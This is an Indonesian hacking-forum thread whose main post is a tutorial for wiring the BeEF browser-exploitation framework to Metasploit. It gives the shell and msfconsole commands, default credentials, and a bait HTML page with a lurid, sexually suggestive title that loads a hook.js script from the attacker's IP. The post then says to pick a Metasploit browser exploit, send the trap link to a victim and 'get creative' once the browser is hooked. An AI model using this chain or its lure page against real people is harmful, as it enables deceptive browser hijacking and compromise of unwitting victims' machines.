Share Konfigurasi Beef dengan Metasploit - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html) +---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html) +---- Thread: Share Konfigurasi Beef dengan Metasploit (/thread-6133.html) |
Konfigurasi Beef dengan Metasploit - x_code - 12-04-2014 Sesuai judul kali ini ane bakal share tutorial buat konfigurasi beef dengan metasploit. pada tutorial part 1 ini ane bakal buat sampai metasploit & Beef bisa bekerja sama, untuk part selanjutnya ane bakal lanjutin cara pemakaiannya. Tutor tested on : My OS : Kali Linux 1.0.9a Victim : win XP sp2 on Vmware Oke ... langsung ke step by step : 1. Change directory ke directory beef, kemudian kita edit file config.yaml nya root@xcrew:~# cd /usr/share/beef-xss root@xcrew:/usr/share/beef-xss#nano config.yaml disini kita akan menkonfigurasi beef ke metasploit, caranya dengan mengubah default parameter untuk metasploit dari false ke true, jika kurang mengerti silahkan liat gambar Spoiler! :
Kemudian di save 2. Step selanjutnya change directory ke direkctory Extensions/metasploit yang ada dalam directory beef, dan edit file config.yaml nya root@xcrew:/usr/share/beef-xss/#cd extensions/metasploit root@xcrew:/usr/share/beef-xss/extensions/metasploit# ls api.rb config.yaml extension.rb module.rb rpcclient.rb root@xcrew:/usr/share/beef-xss/extensions/metasploit# nano config.yaml Pada bagian Host, ganti 127.0.0.1 dengan IP anda , begitupun pada bagian callback_host. Kemudian pada bagian {os: 'custom', path, isi dengan lokasi metasploit : /usr/share/metasploit-framework/ Jika kurang mengerti silahkan lihat gambar : Spoiler! :
Spoiler! :
3. Langkah selanjutnya kita jalankan metasploitnya Spoiler! :
4. Sekarang kita load settingan yang sudah kita buat tadi, di console metasploit ketikkan : msf > load msgrpc ServerHost=<ip anda> Pass=abc123 kok passwordnya : abc123 ? dapetnya dari mana ? password abc123 merupakan password standart yang bisa kita lihat di config.yaml di directory extensions/metasploit jika tidak ada kesalahan maka akan muncul seperti gambar di bawah ini : Spoiler! :
5. Sekarang kita arahkan directory ke directory beef, dan kita buka beefnya. root@xcrew:/usr/share/beef-xss/extensions/metasploit# cd .. root@xcrew:/usr/share/beef-xss/extensions# cd .. root@xcrew:/usr/share/beef-xss# ./beef -x kok ./beef -x ? maksudnya apa ? maksudnya -x adalah untuk mereset database beef, kok lama ? yo sabar :3 namanya juga lagi proses jika tidak ada eror maka akan muncul seperti ini : Spoiler! :
kok ada API eror ? ntu eror karna integrasi metasploitnya, beef tetep working kok 6. Sekarang lihat output pas kita buka beef tadi, disono terdapat 2 jenis URL, yang pertama UI panel, yang kedua hook.js copikan url UI/Panel ke browser anda, maka akan masuk ke panel beef, kemudian login dengan User & password : beef Spoiler! :
Jika berhasil sampai disini berarti kita sudah berhasil mengkonfigurasi beef & metasploit, selanjutnya ngapaen ? emang kalo udah berhasil bisa apa ? Berhubung stock rokok masih banyak ane lanjutin dah . 7. Sekarang kita buat simple script HTML untuk dijadikan umpan nantinya. change directory ke /var/www/ , dalam contoh ini ane buat 1 folder dalam directory var/www dengan nama xcrew. open your terminal and type : root@xcrew:~# cd /var/www/ root@xcrew:/var/www# mkdir xcrew root@xcrew:/var/www# cd xcrew root@xcrew:/var/www/xcrew# nano kemudian isi dengan code html seperti dibawah ini : <html> <head> <title>Anak SMA Mesum Di Kelas</title> <script src="http://<ip anda>:3000/hook.js"></script> </head> <body> <img src="mesum.jpg"/> </body> <html> Keterangan : 1. Pada bagian title silahkan pikirkan kata2 yang menurut ente bikin orang tertarik buat ngebuka ntu link 2. Pada bagian Script src, isikan dengan url hook.js yang kita dapat saat starting beef 3. Pada bagian img src, silahkan cari gambar yang mendukung ttitle yang ente buat tadi, kemudian gambar tersebut letakkan di folder var/www/<yourdir>, kalo ane kan naro di dir xcrew 4. kemudian save file dengan nama index.html jika kurang mengerti silahkan lihat gambar : Spoiler! :
Spoiler! :
8. Step selanjutnya kita akan mulai membuat exploit untuk victim target, dalam tutor ini ane make exploit buat IE 6 , karna win xp di vmware ane masih make IE 6 , cara ini tidak terbatas untuk Win Xp saja, bisa digunakan untuk semua jenis exploit yang ada di metasploit. so, silahkan pilih sendiri exploit anda, misalnya pengen exploit win 7 ya pada tahap ini tinggal setting exploit buat windows 7 9. Oke .. exploit sudah kita set, selanjutnya berikan link trap kita ke victim ( monggo di pikir ke caranye piye ) ntar page yang kebuka adalah gambar yang kita masukkan kedalam code html kita tadi url yang kita berikan seperti ini : http://<your Ip >/xcrew/index.html berhubung victim ane kagak ada flashnye jadi g mau k load picnya : Spoiler! :
setelah di eksekusi victim sekarang kita masuk ke UI/Panel beef tadi, maka akan jadi gini : Spoiler! :
selanjutnya silahkan berkreasi Demikian tutorial kali ini, semoga bermanfaat, jika ada pertanyaan monggo ditanyakan ... jika bersedia ++ nya juga ane g nolak .. jika ada yang salah mohon di perbaiki ... Jika ada yang janda mohon di bagi :v Tutorial created by Xcode salam ... RE: Konfigurasi Beef dengan Metasploit - cyberking - 12-04-2014 +2 ) thanks for sharing RE: Konfigurasi Beef dengan Metasploit - x_code - 12-04-2014 (12-04-2014, 06:52 PM)cyberking Wrote: +2 ) thanks for sharing Wogh ... matur thank Q juga bang semoga bermanfaat RE: Konfigurasi Beef dengan Metasploit - xsan-lahci - 12-04-2014 gambarnya bisa di move ga bro upload ke photobucket , kecil banget gambarnya . nice share , cek kulkas ya RE: Konfigurasi Beef dengan Metasploit - x_code - 12-04-2014 (12-04-2014, 06:56 PM)xsan-lahci Wrote: gambarnya bisa di move ga bro upload ke photobucket , kecil banget gambarnya . nice share , cek kulkas ya bntar ya bang .. tangan masih pegel dapet jatah makan malam dari bang @xsan-lahci , makasih bang tapi kalo di klik gede kok picnya bang RE: Konfigurasi Beef dengan Metasploit - xsan-lahci - 12-04-2014 yadah gpp deh bro . keep share |